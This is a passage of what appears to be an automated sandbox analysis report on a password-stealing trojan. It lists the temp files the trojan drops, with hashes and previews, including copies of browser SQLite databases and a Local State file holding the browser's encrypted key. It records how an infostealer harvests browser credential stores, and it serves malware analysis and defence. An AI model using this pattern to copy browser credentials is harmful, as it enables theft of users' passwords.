Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp

C:\Users\user\AppData\Local\Temp\tmp2A56.tmp Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp2A57.tmp Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	87165
Entropy (8bit):	6.102565506017432
Encrypted:	false
SSDEEP:	1536:S9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SsfFcbXafIB0u1GOJmA3iuR+
MD5:	CC02ABB348037609ED09EC9157D55234
SHA1:	32411A59960ECF4D7434232194A5B3DB55817647
SHA-256:	62E0236494260F5C9FFF1C4DBF1A57C66B28A5ABE1ACF21B26D08235C735C7D8
SHA-512:	AC95705ED369D82B65200354E10875F6AD5EBC4E0F9FFC61AE6C45C32410B6F55D4C47B219BA4722B6E15C34AC57F91270581DB0A391711D70AF376170DE2A35
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp

C:\Users\user\AppData\Local\Temp\tmp2A87.tmp Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp2A88.tmp Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	87165
Entropy (8bit):	6.102565506017432
Encrypted:	false
SSDEEP:	1536:S9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SsfFcbXafIB0u1GOJmA3iuR+
MD5:	CC02ABB348037609ED09EC9157D55234
SHA1:	32411A59960ECF4D7434232194A5B3DB55817647
SHA-256:	62E0236494260F5C9FFF1C4DBF1A57C66B28A5ABE1ACF21B26D08235C735C7D8
SHA-512:	AC95705ED369D82B65200354E10875F6AD5EBC4E0F9FFC61AE6C45C32410B6F55D4C47B219BA4722B6E15C34AC57F91270581DB0A391711D70AF376170DE2A35
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp

C:\Users\user\AppData\Local\Temp\tmp2A89.tmp Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp2A8A.tmp Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	87165
Entropy (8bit):	6.102565506017432
Encrypted:	false
SSDEEP:	1536:S9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SsfFcbXafIB0u1GOJmA3iuR+
MD5:	CC02ABB348037609ED09EC9157D55234
SHA1:	32411A59960ECF4D7434232194A5B3DB55817647
SHA-256:	62E0236494260F5C9FFF1C4DBF1A57C66B28A5ABE1ACF21B26D08235C735C7D8
SHA-512:	AC95705ED369D82B65200354E10875F6AD5EBC4E0F9FFC61AE6C45C32410B6F55D4C47B219BA4722B6E15C34AC57F91270581DB0A391711D70AF376170DE2A35
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp

C:\Users\user\AppData\Local\Temp\tmp2A8B.tmp Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp76A9.tmp Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	87165
Entropy (8bit):	6.102565506017432
Encrypted:	false
SSDEEP:	1536:S9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SsfFcbXafIB0u1GOJmA3iuR+
MD5:	CC02ABB348037609ED09EC9157D55234
SHA1:	32411A59960ECF4D7434232194A5B3DB55817647
SHA-256:	62E0236494260F5C9FFF1C4DBF1A57C66B28A5ABE1ACF21B26D08235C735C7D8
SHA-512:	AC95705ED369D82B65200354E10875F6AD5EBC4E0F9FFC61AE6C45C32410B6F55D4C47B219BA4722B6E15C34AC57F91270581DB0A391711D70AF376170DE2A35
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp

C:\Users\user\AppData\Local\Temp\tmp76D9.tmp Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD19C.tmp Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	87165
Entropy (8bit):	6.102565506017432
Encrypted:	false
SSDEEP:	1536:S9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SsfFcbXafIB0u1GOJmA3iuR+
MD5:	CC02ABB348037609ED09EC9157D55234
SHA1:	32411A59960ECF4D7434232194A5B3DB55817647
SHA-256:	62E0236494260F5C9FFF1C4DBF1A57C66B28A5ABE1ACF21B26D08235C735C7D8
SHA-512:	AC95705ED369D82B65200354E10875F6AD5EBC4E0F9FFC61AE6C45C32410B6F55D4C47B219BA4722B6E15C34AC57F91270581DB0A391711D70AF376170DE2A35
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp

C:\Users\user\AppData\Local\Temp\tmpD19D.tmp Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD19E.tmp Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	87165
Entropy (8bit):	6.102565506017432
Encrypted:	false
SSDEEP:	1536:S9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SsfFcbXafIB0u1GOJmA3iuR+
MD5:	CC02ABB348037609ED09EC9157D55234
SHA1:	32411A59960ECF4D7434232194A5B3DB55817647
SHA-256:	62E0236494260F5C9FFF1C4DBF1A57C66B28A5ABE1ACF21B26D08235C735C7D8
SHA-512:	AC95705ED369D82B65200354E10875F6AD5EBC4E0F9FFC61AE6C45C32410B6F55D4C47B219BA4722B6E15C34AC57F91270581DB0A391711D70AF376170DE2A35
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp

C:\Users\user\AppData\Local\Temp\tmpD19F.tmp Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpFE00.tmp Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	87165
Entropy (8bit):	6.102565506017432
Encrypted:	false
SSDEEP:	1536:S9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SsfFcbXafIB0u1GOJmA3iuR+
MD5:	CC02ABB348037609ED09EC9157D55234
SHA1:	32411A59960ECF4D7434232194A5B3DB55817647
SHA-256:	62E0236494260F5C9FFF1C4DBF1A57C66B28A5ABE1ACF21B26D08235C735C7D8
SHA-512:	AC95705ED369D82B65200354E10875F6AD5EBC4E0F9FFC61AE6C45C32410B6F55D4C47B219BA4722B6E15C34AC57F91270581DB0A391711D70AF376170DE2A35
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp

C:\Users\user\AppData\Local\Temp\tmpFE10.tmp Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6970840431455908
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5:	00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1:	14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256:	8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512:	159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpFE11.tmp Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	87165
Entropy (8bit):	6.102565506017432
Encrypted:	false
SSDEEP:	1536:S9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SsfFcbXafIB0u1GOJmA3iuR+
MD5:	CC02ABB348037609ED09EC9157D55234
SHA1:	32411A59960ECF4D7434232194A5B3DB55817647
SHA-256:	62E0236494260F5C9FFF1C4DBF1A57C66B28A5ABE1ACF21B26D08235C735C7D8
SHA-512:	AC95705ED369D82B65200354E10875F6AD5EBC4E0F9FFC61AE6C45C32410B6F55D4C47B219BA4722B6E15C34AC57F91270581DB0A391711D70AF376170DE2A35
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp

C:\Users\user\AppData\Local\Temp\tmpFE51.tmp Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpFE52.tmp Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	87165
Entropy (8bit):	6.102565506017432
Encrypted:	false
SSDEEP:	1536:S9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SsfFcbXafIB0u1GOJmA3iuR+
MD5:	CC02ABB348037609ED09EC9157D55234
SHA1:	32411A59960ECF4D7434232194A5B3DB55817647
SHA-256:	62E0236494260F5C9FFF1C4DBF1A57C66B28A5ABE1ACF21B26D08235C735C7D8
SHA-512:	AC95705ED369D82B65200354E10875F6AD5EBC4E0F9FFC61AE6C45C32410B6F55D4C47B219BA4722B6E15C34AC57F91270581DB0A391711D70AF376170DE2A35
Malicious:	false
